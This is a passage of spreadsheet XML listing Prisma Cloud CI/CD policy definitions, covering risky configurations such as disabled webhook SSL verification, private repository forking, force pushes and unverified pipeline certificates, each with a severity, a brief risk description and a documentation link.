      <c r="Y170" t="inlineStr"/>
      <c r="Z170" t="inlineStr">
        <is>
          <t>{"category":"Data Protection","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA170" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB170" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC170" t="inlineStr"/>
      <c r="AD170" t="b">
        <v>1</v>
      </c>
      <c r="AE170" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF170" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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0" t="inlineStr">
        <is>
          <t>545aa224-616a-4ebf-8c4c-532cde4c018e</t>
        </is>
      </c>
      <c r="AI170" t="inlineStr"/>
      <c r="AJ170" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK170" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="171">
      <c r="A171" t="inlineStr"/>
      <c r="B171" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C171" s="2" t="inlineStr"/>
      <c r="D171" t="inlineStr"/>
      <c r="E171" t="inlineStr"/>
      <c r="F171" t="inlineStr"/>
      <c r="G171" t="b">
        <v>1</v>
      </c>
      <c r="H1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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J171" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="K171" t="inlineStr">
        <is>
          <t>BitBucket repository webhook SSL verification is disabled</t>
        </is>
      </c>
      <c r="L171" t="inlineStr"/>
      <c r="M171" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N171" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O171" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P171" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q171" t="inlineStr"/>
      <c r="R171" t="inlineStr"/>
      <c r="S171" t="inlineStr"/>
      <c r="T171" t="b">
        <v>0</v>
      </c>
      <c r="U171" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V171" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="W171" t="inlineStr">
        <is>
          <t>SSL Verification is disabled for a repository webhook, which instructs Bitbucket to not verify the identity of the remote server. The lack of verification enables attackers to perform a Man In The Middle attack, and to expose the transmitted data.</t>
        </is>
      </c>
      <c r="X171" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/bitbucket-cicd-pipeline-policies/bb-repo-webhook-ssl-verif-disabled</t>
        </is>
      </c>
      <c r="Y171" t="inlineStr"/>
      <c r="Z171" t="inlineStr">
        <is>
          <t>{"category":"Data Protection","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA171" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB171" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC171" t="inlineStr"/>
      <c r="AD171" t="b">
        <v>1</v>
      </c>
      <c r="AE171" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF171" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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1" t="inlineStr">
        <is>
          <t>627d51aa-244d-4c81-adb9-f6d019c4bc2f</t>
        </is>
      </c>
      <c r="AI171" t="inlineStr"/>
      <c r="AJ171" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK171" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="172">
      <c r="A172" t="inlineStr"/>
      <c r="B172" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C172" s="2" t="inlineStr"/>
      <c r="D172" t="inlineStr"/>
      <c r="E172" t="inlineStr"/>
      <c r="F172" t="inlineStr"/>
      <c r="G172" t="b">
        <v>1</v>
      </c>
      <c r="H1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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J172" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="K172" t="inlineStr">
        <is>
          <t>Forking of a private Azure repository is allowed</t>
        </is>
      </c>
      <c r="L172" t="inlineStr"/>
      <c r="M172" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N172" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O172" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P172" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q172" t="inlineStr"/>
      <c r="R172" t="inlineStr"/>
      <c r="S172" t="inlineStr"/>
      <c r="T172" t="b">
        <v>0</v>
      </c>
      <c r="U172" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V172" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="W172" t="inlineStr">
        <is>
          <t>Forking is allowed on private repositories, allowing user accounts with 'read' permissions only to fork a repository to another project or user account. This could allow sensitive code to be inadvertently/intentionally leaked. Additionally, pull requests can be created from the forked repository to the original repository, which could potentially lead to the execution of malicious code on the CI, even by users with read-only permissions on the original repository.</t>
        </is>
      </c>
      <c r="X172" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/azure-repo-cicd-pipeline-policies/azure-repo-fork-private-repo-allowed</t>
        </is>
      </c>
      <c r="Y172" t="inlineStr"/>
      <c r="Z172" t="inlineStr">
        <is>
          <t>{"category":"Data Protection","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA172" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB172" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC172" t="inlineStr"/>
      <c r="AD172" t="b">
        <v>1</v>
      </c>
      <c r="AE172" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF172" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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2" t="inlineStr">
        <is>
          <t>aef010f2-b9fa-4386-a0f7-83d5c034ed11</t>
        </is>
      </c>
      <c r="AI172" t="inlineStr"/>
      <c r="AJ172" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK172" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="173">
      <c r="A173" t="inlineStr"/>
      <c r="B173" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C173" s="2" t="inlineStr"/>
      <c r="D173" t="inlineStr"/>
      <c r="E173" t="inlineStr"/>
      <c r="F173" t="inlineStr"/>
      <c r="G173" t="b">
        <v>1</v>
      </c>
      <c r="H1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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J173" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="K173" t="inlineStr">
        <is>
          <t>Force push to default branch is allowed in GitLab</t>
        </is>
      </c>
      <c r="L173" t="inlineStr"/>
      <c r="M173" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N173" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O173" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P173" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q173" t="inlineStr"/>
      <c r="R173" t="inlineStr"/>
      <c r="S173" t="inlineStr"/>
      <c r="T173" t="b">
        <v>0</v>
      </c>
      <c r="U173" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V173" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="W173" t="inlineStr">
        <is>
          <t>User accounts with Write permissions can force push to a default branch of an actively used repository and overwrite the commit history. If the repository is not stored on another source, a malicious user account can permanently delete the entire git history of the repository. An actively used repository has at least two contributors, over 50 commits, and was updated in the last 90 days.</t>
        </is>
      </c>
      <c r="X173" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/force-push-default-branch-allowed-gl</t>
        </is>
      </c>
      <c r="Y173" t="inlineStr"/>
      <c r="Z173" t="inlineStr">
        <is>
          <t>{"category":"Data Protection","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA173" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB173" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC173" t="inlineStr"/>
      <c r="AD173" t="b">
        <v>1</v>
      </c>
      <c r="AE173" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF173" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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3" t="inlineStr">
        <is>
          <t>aa2db709-8a9e-4da2-9915-a8322aff5eaa</t>
        </is>
      </c>
      <c r="AI173" t="inlineStr"/>
      <c r="AJ173" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK173" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="174">
      <c r="A174" t="inlineStr"/>
      <c r="B174" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C174" s="2" t="inlineStr"/>
      <c r="D174" t="inlineStr"/>
      <c r="E174" t="inlineStr"/>
      <c r="F174" t="inlineStr"/>
      <c r="G174" t="b">
        <v>1</v>
      </c>
      <c r="H1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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J174" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="K174" t="inlineStr">
        <is>
          <t>Forking of BitBucket private repository is allowed</t>
        </is>
      </c>
      <c r="L174" t="inlineStr"/>
      <c r="M174" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N174" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O174" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P174" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q174" t="inlineStr"/>
      <c r="R174" t="inlineStr"/>
      <c r="S174" t="inlineStr"/>
      <c r="T174" t="b">
        <v>0</v>
      </c>
      <c r="U174" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V174" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="W174" t="inlineStr">
        <is>
          <t>Misconfiguration of private repositories may allow sensitive code to be inadvertently/intentionally leaked. A user account can fork the repository to another workspace, leading to leakage of code. It can also lead to the creation of pull requests from the forked repository to the original repository. This can lead to the execution of malicious code on the CI, even by users with read-only permissions on the original repository.</t>
        </is>
      </c>
      <c r="X174" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/bitbucket-cicd-pipeline-policies/bb-fork-private-repo-allow</t>
        </is>
      </c>
      <c r="Y174" t="inlineStr"/>
      <c r="Z174" t="inlineStr">
        <is>
          <t>{"category":"Data Protection","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA174" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB174" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC174" t="inlineStr"/>
      <c r="AD174" t="b">
        <v>1</v>
      </c>
      <c r="AE174" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF174" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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4" t="inlineStr">
        <is>
          <t>b283308d-cdfb-4e59-884b-58352d5365ef</t>
        </is>
      </c>
      <c r="AI174" t="inlineStr"/>
      <c r="AJ174" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK174" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="175">
      <c r="A175" t="inlineStr"/>
      <c r="B175" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C175" s="2" t="inlineStr"/>
      <c r="D175" t="inlineStr"/>
      <c r="E175" t="inlineStr"/>
      <c r="F175" t="inlineStr"/>
      <c r="G175" t="b">
        <v>1</v>
      </c>
      <c r="H1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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J175" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="K175" t="inlineStr">
        <is>
          <t>Certificate not verified by CircleCI pipeline command</t>
        </is>
      </c>
      <c r="L175" t="inlineStr"/>
      <c r="M175" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N175" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O175" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P175" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q175" t="inlineStr"/>
      <c r="R175" t="inlineStr"/>
      <c r="S175" t="inlineStr"/>
      <c r="T175" t="b">
        <v>0</v>
      </c>
      <c r="U175" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V175" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="W175" t="inlineStr">
        <is>
          <t>Not verifying certificates through pipeline commands allows attackers to plant their own certificate and impersonate a server in order to perform a man-in-the-middle attack to intercept, tamper with and/or steal information, to possibly run code in the build system and to reach the production environment.</t>
        </is>
      </c>
      <c r="X175" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/circleci-cicd-pipeline-policies/circleci-cert-unverified</t>
        </is>
      </c>
      <c r="Y175" t="inlineStr"/>
      <c r="Z175" t="inlineStr">
        <is>
          <t>{"category":"Data Protection","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA175" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB175" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC175" t="inlineStr"/>
      <c r="AD175" t="b">
        <v>1</v>
      </c>
      <c r="AE175" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF175" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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5" t="inlineStr">
        <is>
          <t>ab3260e5-fff2-4194-a63a-0957341bae73</t>
        </is>
      </c>
      <c r="AI175" t="inlineStr"/>
      <c r="AJ175" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK175" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="176">
      <c r="A176" t="inlineStr"/>
      <c r="B176" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C176" s="2" t="inlineStr"/>
      <c r="D176" t="inlineStr"/>
      <c r="E176" t="inlineStr"/>
      <c r="F176" t="inlineStr"/>
      <c r="G176" t="b">
        <v>1</v>
      </c>
      <c r="H1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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J176" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="K176" t="inlineStr">
        <is>
          <t>GitHub webhooks sent over unencrypted channel</t>
        </is>
      </c>
      <c r="L176" t="inlineStr"/>
      <c r="M176" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N176" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O176" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P176" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q176" t="inlineStr"/>
      <c r="R176" t="inlineStr"/>
      <c r="S176" t="inlineStr"/>
      <c r="T176" t="b">
        <v>0</v>
      </c>
      <c r="U176" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V176" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="W176" t="inlineStr">
        <is>
          <t>The repository sends events to a webhook over an unencrypted layer. An attacker executing a man-in-the-middle attack can steal or modify the data sent to the webhook.</t>
        </is>
      </c>
      <c r="X176" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-webhooks-sent-unencrypted-channel</t>
        </is>
      </c>
      <c r="Y176" t="inlineStr"/>
      <c r="Z176" t="inlineStr">
        <is>
          <t>{"category":"Data Protection","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA176" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB176" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC176" t="inlineStr"/>
      <c r="AD176" t="b">
        <v>1</v>
      </c>
      <c r="AE176" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF176" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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6" t="inlineStr">
        <is>
          <t>9b183f57-883d-4d73-a5f7-379f50d9bd78</t>
        </is>
      </c>
      <c r="AI176" t="inlineStr"/>
      <c r="AJ176" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK176" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="177">
      <c r="A177" t="inlineStr"/>
      <c r="B177" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C177" s="2" t="inlineStr"/>
      <c r="D177" t="inlineStr"/>
      <c r="E177" t="inlineStr"/>
      <c r="F177" t="inlineStr"/>
      <c r="G177" t="b">
        <v>1</v>
      </c>
      <c r="H1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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J177" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="K177" t="inlineStr">
        <is>
          <t>GitHub private repository made public</t>
        </is>
      </c>
      <c r="L177" t="inlineStr"/>
      <c r="M177" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N177" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O177" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P177" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q177" t="inlineStr"/>
      <c r="R177" t="inlineStr"/>
      <c r="S177" t="inlineStr"/>
      <c r="T177" t="b">
        <v>0</v>
      </c>
      <c r="U177" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V177" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="W177" t="inlineStr">
        <is>
          <t>A private repository made public, allows anyone to access the source code in the repository and to retrieve hard-coded credentials and potentially sensitive information. An attacker might also perform a Public-PPE (3PE) attack and reach the production environment. For more on 3PE see https://www.cidersecurity.io/top-10-cicd-security-risks/poisoned-pipeline-execution-ppe</t>
        </is>
      </c>
      <c r="X177" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-private-repo-made-public</t>
        </is>
      </c>
      <c r="Y177" t="inlineStr"/>
      <c r="Z177" t="inlineStr">
        <is>
          <t>{"category":"Data Protection","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA177" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB177" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC177" t="inlineStr"/>
      <c r="AD177" t="b">
        <v>1</v>
      </c>
      <c r="AE177" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF177" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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7" t="inlineStr">
        <is>
          <t>8440e40c-beea-4b15-8b8c-87c00dfc3a22</t>
        </is>
      </c>
      <c r="AI177" t="inlineStr"/>
      <c r="AJ177" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK177" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="178">
      <c r="A178" t="inlineStr"/>
      <c r="B178" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C178" s="2" t="inlineStr"/>
      <c r="D178" t="inlineStr"/>
      <c r="E178" t="inlineStr"/>
      <c r="F178" t="inlineStr"/>
      <c r="G178" t="b">
        <v>1</v>
      </c>
      <c r="H1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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J178" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="K178" t="inlineStr">
        <is>
          <t>Certificate not verified by Azure Pipelines pipeline command</t>
        </is>
      </c>
      <c r="L178" t="inlineStr"/>
      <c r="M178" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N178" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O178" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P178" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q178" t="inlineStr"/>
      <c r="R178" t="inlineStr"/>
      <c r="S178" t="inlineStr"/>
      <c r="T178" t="b">
        <v>0</v>
      </c>
      <c r="U178" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V178" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="W178" t="inlineStr">
        <is>
          <t>Not verifying certificates through pipeline commands allows attackers to plant their own certificate and impersonate a server in order to perform a man-in-the-middle attack to intercept, tamper with and/or steal information, to possibly run code in the build system and to reach the production environment.</t>
        </is>
      </c>
      <c r="X178" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/azure-repo-cicd-pipeline-policies/azure-repo-certificate-unverified</t>
        </is>
      </c>
      <c r="Y178" t="inlineStr"/>
      <c r="Z178" t="inlineStr">
        <is>
          <t>{"category":"Data Protection","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA178" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB178" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC178" t="inlineStr"/>
      <c r="AD178" t="b">
        <v>1</v>
      </c>
      <c r="AE178" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF178" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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8" t="inlineStr">
        <is>
          <t>0948afba-1a3d-40d1-a692-26623ed3156a</t>
        </is>
      </c>
      <c r="AI178" t="inlineStr"/>
      <c r="AJ178" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK178" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="179">
      <c r="A179" t="inlineStr"/>
      <c r="B179" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C179" s="2" t="inlineStr"/>
      <c r="D179" t="inlineStr"/>
      <c r="E179" t="inlineStr"/>
      <c r="F179" t="inlineStr"/>
      <c r="G179" t="b">
        <v>1</v>
      </c>
      <c r="H1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9" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J179" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="K179" t="inlineStr">
        <is>
          <t>Project Service hooks sent over unencrypted channel</t>
        </is>
      </c>
      <c r="L179" t="inlineStr"/>
      <c r="M179" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N179" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O179" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P179" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q179" t="inlineStr"/>
      <c r="R179" t="inlineStr"/>
      <c r="S179" t="inlineStr"/>
      <c r="T179" t="b">
        <v>0</v>
      </c>
      <c r="U179" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V179" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="W179" t="inlineStr">
        <is>
          <t>The project sends events to a webhook over an unencrypted channel. An attacker executing a man-in-the-middle attack can steal or modify the data sent to the webhook.</t>
        </is>
      </c>
      <c r="X179" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/azure-repo-cicd-pipeline-policies/azure-repo-project-service-hook-sent-unencrypted</t>
        </is>
      </c>
      <c r="Y179" t="inlineStr"/>
      <c r="Z179" t="inlineStr">
        <is>
          <t>{"category":"Data Protection","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA179" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB179" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC179" t="inlineStr"/>
      <c r="AD179" t="b">
        <v>1</v>
      </c>
      <c r="AE179" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF179" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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9" t="inlineStr">
        <is>
          <t>986494de-cbd0-431b-8457-3eb628ebe371</t>
        </is>
      </c>
      <c r="AI179" t="inlineStr"/>
      <c r="AJ179" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK179" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="180">
      <c r="A180" t="inlineStr"/>
      <c r="B180" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C180" s="2" t="inlineStr"/>
      <c r="D180" t="inlineStr"/>
      <c r="E180" t="inlineStr"/>
      <c r="F180" t="inlineStr"/>
      <c r="G180" t="b">
        <v>1</v>
      </c>
      <c r="H1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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J180" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="K180" t="inlineStr">
        <is>
          <t>Force push to default branch is allowed in GitHub</t>
        </is>
      </c>
      <c r="L180" t="inlineStr"/>
      <c r="M180" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N180" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O180" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P180" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q180" t="inlineStr"/>
      <c r="R180" t="inlineStr"/>
      <c r="S180" t="inlineStr"/>
      <c r="T180" t="b">
        <v>0</v>
      </c>
      <c r="U180" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V180" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="W180" t="inlineStr">
        <is>
          <t>User accounts with Write permissions can force push to a default branch of an actively used repository and overwrite the commit history. If the repository is not stored on another source, a malicious user account can permanently delete the entire git history of the repository. An actively used repository has at least two contributors, over 50 commits, and was updated in the last 90 days.</t>
        </is>
      </c>
      <c r="X180" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/force-push-default-branch-allowed-gh</t>
        </is>
      </c>
      <c r="Y180" t="inlineStr"/>
      <c r="Z180" t="inlineStr">
        <is>
          <t>{"category":"Data Protection","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA180" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB180" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
